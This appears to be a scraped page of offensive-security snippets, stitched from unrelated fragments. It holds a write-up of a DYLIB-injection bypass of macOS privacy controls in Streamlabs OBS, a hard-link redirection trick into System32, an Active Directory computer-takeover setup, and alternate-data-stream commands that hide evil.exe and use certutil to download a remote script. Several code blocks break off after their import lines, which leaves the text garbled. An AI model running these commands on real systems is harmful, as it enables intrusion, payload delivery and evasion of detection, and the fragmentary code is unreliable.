Ronan Kervella rkervella

StreamLabs OBS macOS TCC bypass

The Streamlabs macOS thick client does have hardened runtime enabled, but specifically allows DYLD environment variables and also disables library validation, which kills the purpose of hardened runtime. Having these settings on the executable enables an attacker to inject custom DYLIB libraries into the application. This would allow an attacker to access data inside the app, and possibly gain persistence on a machine, beyond that, as StreamLabs has access to the microphone and camera a user would gain access to that once exploited.

We can see the wrong permissions with running the codesign utility:

csaby@bigsur ~ % codesign -dv --entitlements :- /Applications/Streamlabs\ OBS.app 
Executable=/Applications/Streamlabs OBS.app/Contents/MacOS/Streamlabs OBS
Identifier=com.streamlabs.slobs
Format=app bundle with Mach-O thin (x86_64)

Using Hard Links to point back to attacker controlled location.

mklink /h C:\Windows\System32\Tasks\tasks.dll C:\Tools\Tasks.dll
Hardlink created for C:\Windows\System32\Tasks\tasks.dll <<===>> C:\Tools\Tasks.dll

This can redirect the search to an arbitrary location and evade tools that are looking for filemods in a particular location.

xref: https://googleprojectzero.blogspot.com/2015/12/between-rock-and-hard-link.html

	package com.redtimmy;

	import java.io.ByteArrayOutputStream;
	import java.io.IOException;
	import java.io.ObjectOutputStream;
	import java.lang.reflect.Field;
	import java.net.URL;
	import java.security.KeyManagementException;
	import java.security.NoSuchAlgorithmException;
	import java.security.cert.X509Certificate;

	package main

	import (
	//This is a modified version of natefinch's npipe where I exposed the handle in PipeConn struct so that I can use it as needed
	"sepipe/npipe"
	"bytes"
	"fmt"
	"io"
	"os"
	"sync"

	# import the necessary toolsets
	Import-Module .\powermad.ps1
	Import-Module .\powerview.ps1

	# we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account
	whoami

	# the target computer object we're taking over
	$TargetComputer = "primary.testlab.local"

	###Add content to ADS###
	type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
	extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
	findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
	certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
	makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
	print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe
	reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
	regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
	expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat

	#include <stdio.h>
	#include <stdlib.h>
	#include <sys/stat.h>
	#include <unistd.h>
	#include <mach/mach.h>
	#include <mach/mach_vm.h>
	#include <dlfcn.h>
	#include <objc/runtime.h>

	import sys


	class DomainUser(object):

	def __init__(self, username, lmhash, ntlmhash):
	super().__init__()
	self.lm = lmhash
	self.ntlm = ntlmhash
	self.username = username